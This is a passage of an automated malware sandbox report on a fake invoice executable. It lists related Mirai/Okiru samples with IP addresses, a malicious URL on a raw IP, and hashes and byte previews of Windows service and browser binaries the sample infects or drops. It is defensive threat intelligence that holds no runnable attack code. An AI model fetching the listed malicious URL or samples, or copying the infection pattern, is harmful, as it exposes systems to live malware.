                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.252.132.130
                                        arm.elfGet hashmaliciousUnknownBrowse
                                        • 34.249.145.219
                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 13.222.71.194
                                        http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                        • 52.24.227.163
                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.242.255.3
                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 44.228.127.176
                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 3.251.85.156
                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.184.233.255
                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.194.49.4
                                        AMAZON-02USchos.exeGet hashmaliciousUnknownBrowse
                                        • 45.112.123.126
                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.252.132.130
                                        arm.elfGet hashmaliciousUnknownBrowse
                                        • 34.249.145.219
                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 13.222.71.194
                                        http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                        • 52.24.227.163
                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.242.255.3
                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 44.228.127.176
                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 3.251.85.156
                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.184.233.255
                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 18.194.49.4

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1658880
                                        Entropy (8bit):4.312984062003007
                                        Encrypted:false
                                        SSDEEP:24576:jxGBcmlUsVg9N9JMlDlfjRiVuVsWt5MJMs:tGy+UMgFIDRRAubt5M
                                        MD5:4768582FEC7E07C429C532098BB3A67A
                                        SHA1:11ECD8AC35E2D91E8A2D776B0D9F59AB33092AC0
                                        SHA-256:4277157B276F8860465F731DE4C2A04B185F6C2D40C698738411C779B2BBA506
                                        SHA-512:7361D630E4A580E2A856B0A61D788EE8716914F31C897573198492DE4CD4A17083BC5DC456595754448EA96C3F0791EAF95C82C667FB879539EDD591DFFDA194
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................Q......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):2354176
                                        Entropy (8bit):7.049187675199965
                                        Encrypted:false
                                        SSDEEP:49152:3hDdVrQ95RW0YEHyWQXE/09Val0GuMgFIDRRAubt5M:3hHYW+HyWKVUf
                                        MD5:F48DDCBA6A247532AFB4E29CAAD7C016
                                        SHA1:1CE7EB6458D849AF138CCDD55440D84DB7B5FAFB
                                        SHA-256:EE240B771106FFBDDDC058040D60F41283C814D39FA058F5D67AB9FE86CBAEF8
                                        SHA-512:76B43A0DCA9403EB6E79019C5D59B4BDCA7230C7CAF20DE504594B47BACFEDB298469662A7F41AD58223B299BC6C329B6CEF5CBEC4C9F2F196C9C02EE3DDA031
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....}.$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                        C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                        Download File
                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3141
                                        Entropy (8bit):4.918707299392163
                                        Encrypted:false
                                        SSDEEP:24:l8+dw84r8j8G8n48Z8zRz8ZWtF8o8ZWmIF8+18I8P8Bu8X8J8ZWqF8ov85x8ZWlb:5MeRxpmysKKvBfqEeznQD
                                        MD5:1C27F101CBF893E2D8E9D42D21F439D4
                                        SHA1:6724FCAF7675AF20B3C924E41DD17E3602D5E7D9
                                        SHA-256:852009D0CAD8E070AA017F9C33CC3C93247603ABC012AC45C1CF2A8DD133D5E4
                                        SHA-512:8737664142DF55D739E8661CD5AA1D679944AD8312D1AA18E980583DD8A037195ECABD6A322C459A3303FE859913A93F58EA8BCDB427485CA3C4E0FE949408C4
                                        Malicious:false
                                        Reputation:low
                                        Preview:2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-13 02:57:46-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-13 02:57:46-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-13 02:57:4

                                        C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1725440
                                        Entropy (8bit):4.4125006099097694
                                        Encrypted:false
                                        SSDEEP:24576:XQVTZu0JUsVg9N9JMlDlfjRiVuVsWt5MJMs:gVTZuTMgFIDRRAubt5M
                                        MD5:1B5C1CB5B173A3E9004CEBAB7FD31E75
                                        SHA1:578195205A8DD08A4BF42CB3E2B0B304E08D0D73
                                        SHA-256:E6E798122CE373B8377E6DD941EE24D1757B3F00FA5C8C63E3158D86EA5B28A6
                                        SHA-512:62A0E3F1C32B988C0F948BC591F4C24485C55101C0A505555C7BE44EC9244D0EDC3B1F1FB3ECB64A91A746549CB532300A558168AF7165A5BA608551BF24B4E3
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@....................................UW.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...............t..............@...........................................................................................................................................................................................................................

                                        C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):2370560
                                        Entropy (8bit):7.031526152160088
                                        Encrypted:false
                                        SSDEEP:49152:RAMsOu3JfCIGnZuTodRFYKBrFxbWpcMgFIDRRAubt5M:RAMa38ZuTS3Uf
                                        MD5:C61DF72ECB866868D4B381421F663F20
                                        SHA1:F1E66CA647E1180982465F6C2366F098E75823FA
                                        SHA-256:37AAC981227D3A3491E7789285ED15105D8C17D63DB7DA0124E32984F1CAA533
                                        SHA-512:80682A3FE04BD5DC17C25BFD4CF9C3B5F69575518EF81612AFA3BB0624954DCC0E87A6056F203FCB85443D768EFB27DACDD24E31E1734E244FADA9CDCB577552
                                        Malicious:true
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....R8$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\aut1551.tmp

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.995710526450922
                                        Encrypted:true
                                        SSDEEP:6144:t/rGfEQFP6TamMuTGhPp2jiiCU8iGg2svL2oL7ke+5PELQ:tzGM8P6vM2LCIGg2ZoLAV
                                        MD5:3AD54B7B8886FA858714144BDAEE1CD1
                                        SHA1:B6395960A7F28E75D7878B55E3068F6164D96E07
                                        SHA-256:6E84671DF72B3301C175BBA07A83631A0B0D4BE8404009DB84020AC8DA9773B3
                                        SHA-512:CC2D9F97AFBFED1632D0D4DFC872B62B6361CFA2AC93C1741E84263B1E3391826A1C2AFA502D5A132AD1341140DA92C11455150C354D42FD85B20CA6A5C7C327
                                        Malicious:false
                                        Preview:...XQ0W7BH8X..KN.OLAUVV5tX4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0.7FH6G.JK.^.m.T...`0]#dI*=W%V+h[9'*$:w-)a'#8.]6...jx?_3RhE5RmDKNWOLA,W_..8S.yY?..7P.R..~+).U..j6R.B....85..^% .8..KNWOLAUV.p4XxQE9....7FH8XIDK.WMMJT]V5b\4PD9XR0W7F]8XITKNW?HAUV.54H4PD;XR6W7FH8XIBKNWOLAUV&14X6PD9XR0U7..8XYDK^WOLAEVV%4X4PD9HR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4~0\ &0W7..<XITKNW.HAUFV54X4PD9XR0W7Fh8X)DKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4P

                                        C:\Users\user\AppData\Local\Temp\differences

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.995710526450922
                                        Encrypted:true
                                        SSDEEP:6144:t/rGfEQFP6TamMuTGhPp2jiiCU8iGg2svL2oL7ke+5PELQ:tzGM8P6vM2LCIGg2ZoLAV
                                        MD5:3AD54B7B8886FA858714144BDAEE1CD1
                                        SHA1:B6395960A7F28E75D7878B55E3068F6164D96E07
                                        SHA-256:6E84671DF72B3301C175BBA07A83631A0B0D4BE8404009DB84020AC8DA9773B3
                                        SHA-512:CC2D9F97AFBFED1632D0D4DFC872B62B6361CFA2AC93C1741E84263B1E3391826A1C2AFA502D5A132AD1341140DA92C11455150C354D42FD85B20CA6A5C7C327
                                        Malicious:false
                                        Preview:...XQ0W7BH8X..KN.OLAUVV5tX4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0.7FH6G.JK.^.m.T...`0]#dI*=W%V+h[9'*$:w-)a'#8.]6...jx?_3RhE5RmDKNWOLA,W_..8S.yY?..7P.R..~+).U..j6R.B....85..^% .8..KNWOLAUV.p4XxQE9....7FH8XIDK.WMMJT]V5b\4PD9XR0W7F]8XITKNW?HAUV.54H4PD;XR6W7FH8XIBKNWOLAUV&14X6PD9XR0U7..8XYDK^WOLAEVV%4X4PD9HR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4~0\ &0W7..<XITKNW.HAUFV54X4PD9XR0W7Fh8X)DKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4PD9XR0W7FH8XIDKNWOLAUVV54X4P

                                        C:\Users\user\AppData\Roaming\7c03ee2ee2c8fb2a.bin

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12320
                                        Entropy (8bit):7.985533036289979
                                        Encrypted:false
                                        SSDEEP:384:jvPLIRNPIEyYUS9l7qZYeiVDWsc2seouw4iT1Yy:7ERSA7qZ9iVDZc2DdwR
                                        MD5:4CF398F322DA2FC3622B9FF1333F66FF
                                        SHA1:4D9F71ED4859423C57A20D3F196B3E364D5BEA20
                                        SHA-256:00D8CA784E4B543B037DE643F46D9A9E31AC0D8D9479389BD9BB91FA3C2D9C9B
                                        SHA-512:08040D40ECA6938BF26028BC773AF87DF47E1D7993A23D8F2F593A32913C9CA01773DB1E91DD3E06BE089C01A5F2F81ADE4C60F64E0325918F0B3DA87F2772D0
                                        Malicious:false
                                        Preview:..+.........S..t....P...U.Ee....(.D.'l.Y&.].a([.%.@R#..#m.&hjt...$|...*...@...?C...".l..p.3Ly.....f.ta..8`.%.`=.=.l...62.^....*:..Gpo2.q)i*?.1..YR".J....J.wx.(9..Q.).....E3.e.E..&...O.....R].......t.U^y|...;.x..7..[.0a..2/y4.4..G'...sK...I.......xq...9......$......!a.J.`..CZ.a.8..gQgf.....J.W.~i...~].O.&}.t:.j....P%M..s#mUKa.......[c.......Y/........L.9...oF..J~......,IT.Tx..o.......5.....R.k.....6.B..gz...M..{..G.|....g.Y...d.E..qL.B....,..s....cm....by....kH...........99...8.......\qH..(.TjV....XT..Q.1.x..'Q. >=#ll......B..d.~.0.S..C.....N..!;..;.K..6..0Q.....^!..... R.<.0.`TY.7.......J...Of7.C...$..8..8C.;.C...5..?.;......<.".?h.......ki.9...G..".&..B.Y.-".|=.Z..).l7.Nz..b..4.....T..W..a$...v.}.e9..t&Y...$::......U9.Oap....&..S=~....Y.....T.!-..s..n5..5....U....c...%.j.Q!T...._.b.i.....ae..Cw.........c.3.6.Cn...^....O...4..ZJ..&..$.|.............E..%.:M.u.......~..`..K....[......=//.......H.!KP..]..$i....G..~...TJ.=..$/...R..L...x._2p .

                                        C:\Windows\System32\AppVClient.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1348608
                                        Entropy (8bit):7.251540682469764
                                        Encrypted:false
                                        SSDEEP:24576:IQW4qoNUgslKNX0Ip0MgHCpoMBOujsVg9N9JMlDlfjRiVuVsWt5MJMs:IQW9BKNX0IPgiKMBOujMgFIDRRAubt5M
                                        MD5:BAE30C5C71632F53795DE111E7ED6DC7
                                        SHA1:A0DB5102379087FC512F4B59CE535E7E1391801D
                                        SHA-256:39DBEF4B667217817579A86B31FF16F3B072A86C9CF1A64EB8EFD19639B1AB39
                                        SHA-512:1C74B11AB26FCF3E0FB7109C94B91919F35A6A78C04CEBF15A4DF6BB713F37CDFFC584C5E654C2844654A38FB147A95E9CE8A5AA0724BB1BF86B1879252B4421
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                        C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1592832
                                        Entropy (8bit):4.174807577471976
                                        Encrypted:false
                                        SSDEEP:24576:I2G7AbHjkGsVg9N9JMlDlfjRiVuVsWt5MJMs:I2G7AbHjdMgFIDRRAubt5M
                                        MD5:EF72E511E2DBB8EA505947340C908203
                                        SHA1:1F57A13B99C7C9C19ED3D6EA00A5F5488C30C7FB
                                        SHA-256:8DF02E1AE7BB8B6B4E02A8EB5E9AAFAD5FDEC5877D654825DB3D1789835852C0
                                        SHA-512:55392E3CC5D34E4D76D503002F86AC1881081C5030560F6D573654325787345E4688CFE3AD79BC72BD55F246AC67057C9D3A43EF7519854BE7C88ABCA15A0F95
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

                                        C:\Windows\System32\FXSSVC.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1242624
                                        Entropy (8bit):7.287652271182454
                                        Encrypted:false
                                        SSDEEP:24576:gkdpSI+K3S/GWei+qNv2wG3OsVg9N9JMlDlfjRiVuVsWt5MJMs:g6SIGGWei2wG3OMgFIDRRAubt5M
                                        MD5:CCD5F7B3E8C0B4733DD115FF88547F14
                                        SHA1:AC828EB290C3B315BD9DA53CF08EB7003AAB88B7
                                        SHA-256:5A7427E62563F40070CEBECFB77F386B78E2F229F1E3B9BA21855515EC42009A
                                        SHA-512:D122B70EF77F9F3AD79FCEC643BD0B3983BAD39392CB688C33FAFD2508AF1665EA5B000FF87C96637F1CA5FFD73BFD85D15E80130DA6BF907D7D15E1DF7D9E22
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P........... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                        C:\Windows\System32\alg.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1594368
                                        Entropy (8bit):4.175664576271887
                                        Encrypted:false
                                        SSDEEP:12288:iEP3RF1AV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:hF1sVg9N9JMlDlfjRiVuVsWt5MJMs
                                        MD5:B0C38B43BA0CC2CDF73E2C84A80101CF
                                        SHA1:C3E72FC7A9FA46BFB9AAD09F6D5CA1577665DD9F
                                        SHA-256:26C6A8A5C55F277F1CBAB56E9195B7D76402A2CB2966D0AA8B4CCD0AB9643718
                                        SHA-512:4319403726E700966582510F0903B9593CC18AB371346F8415864E00C3E02351783AC09FA45064DA02EC4D2602EAF6B7A20A7C698154CCB84AD0213894D30204
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                                        C:\Windows\System32\config\systemprofile\AppData\Roaming\7c03ee2ee2c8fb2a.bin

                                        Download File
                                        Process:C:\Windows\System32\AppVClient.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12320
                                        Entropy (8bit):7.982693516101535
                                        Encrypted:false
                                        SSDEEP:384:0SCTk5UZuOtPBZvIOexAntEqJ3V7PoPw0:rD5muONBZgOeGnaG1E
                                        MD5:DFBB5131EE48B4475E4105A0E18533B1
                                        SHA1:CEAAA49DDC83A29AA187A23A86C6A35C830B1023
                                        SHA-256:F2EFF4A2536C40A76F7650E15BC37ED8D1EE052B354388A91DB8C2B5D62D0B17
                                        SHA-512:47424C51B9D7E74B097D203E0C230F3C2110BBE175966D99F4063D9E0896F48926588743AC2F242A6560A62D2E773DF5D9D76B6184102242E75D834CECDADD94
                                        Malicious:false
                                        Preview:.8.}...;.f...."........0..$.g.Fe.Q.e.u.$.Q..d..."....9|..?.6.)V.E].fn..}....VS.......xgY.....x...`.2.-6..&..'..u..q....T..f...<..,..C......}...&_...m.S...Y.l.(.......myn8.~"*.....{.3.Mz.J.(.....].~.I3..,+....7.O..~......M_R........Q..S&(........c*..&U....}L....`........!A.=...Y].dB.z..E92.at...c..@..2y....a.}..h..o..z/[...-.0B.#X.......w'm#..H.t.n...e?|...`/.... .-...W.-..&.#n.e...._..=...t...w...a..0D.....y.......?".......d^7..s{.+..T.]....,~+....?)..m^...........ds...5..T8........C....b.D....g....\.?.J..{.P..3.9....jJ.7...Ej.3H.+:..hOMkR......3.......Ip.X.H`..)....q'..3. '.....D.:=.S .B.Fk.b....[...|....A.G\T(...)4&c...;..2Z...J..).%g(KR....9............-}K..._@...ZS.!.q7.?.{e....kJz,E....Hu..n.X@.n.x.+a..l|..W.".~.....OeF...-..i.....{.....DY.../.....Z.y.....J..x......3z.A..].B..s-...j..^.c.p....fY...MX..JvZ.Y.B....."..V.s...|...M...N.$........(..t.w.8m..TH.....d2..|.+'D..:.....T......n..F.y.+..... &.B+Z'.e..,...0.1[.......6bWxB].......a....0

                                        C:\Windows\System32\msdtc.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:modified
                                        Size (bytes):1647104
                                        Entropy (8bit):4.190898007941441
                                        Encrypted:false
                                        SSDEEP:12288:VjkyIAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:VIyIsVg9N9JMlDlfjRiVuVsWt5MJMs
                                        MD5:9F6FD3589C1C092A0F51D0AE55C2B941
                                        SHA1:26BD7A89B570F41F03DECBEAF4DEFDA040B377DB
                                        SHA-256:F069B2101EFF5493FD98143DB83BB802F8920C82E54DCE8742093EB1362C011A
                                        SHA-512:652F69CCB5844FAAAA317713867E3FA874CF193AA1978270CB280942A4AB92BC2254C0CF436683ABA12984A6C1C57437B3BA0F84EA65A052DBD77926F890C446
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................T..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...............B..............@...................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.517370504422139
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:INV_NE_02_2034388.exe
                                        File size:1'790'464 bytes
                                        MD5:c5843430a72fa7b29070c33f0f4d83d2
                                        SHA1:a5c6c473fc57e7a8b26bb4acef0be2843aa56653
                                        SHA256:77fff1c59aace50f9bbb9184b1086cccb57df0cb5d3b10589a9b6b91283aa719
                                        SHA512:30c29a3915e07c210af36a50fb97eada75ebc8ffeefe18747fd934ff59f955181762a023c5d69ccdbefdfe67d9a7c2e925160e5b35b2d031cdc818dbac83ce0e
                                        SSDEEP:49152:FG0c++OCvkGs9Fabb7Y+gFIDRRAubt5M:0B3vkJ92GUf
                                        TLSH:6B85E02273DDC360CB669173FF6AB7016EBF7C610630B85B1F980D79A960162162D7A3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                        File Icon

                                        Icon Hash:aaf3e3e3938382a0

                                        Static PE Info

                                        General

                                        Entrypoint:0x427dcd
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x675B7F22 [Fri Dec 13 00:26:10 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
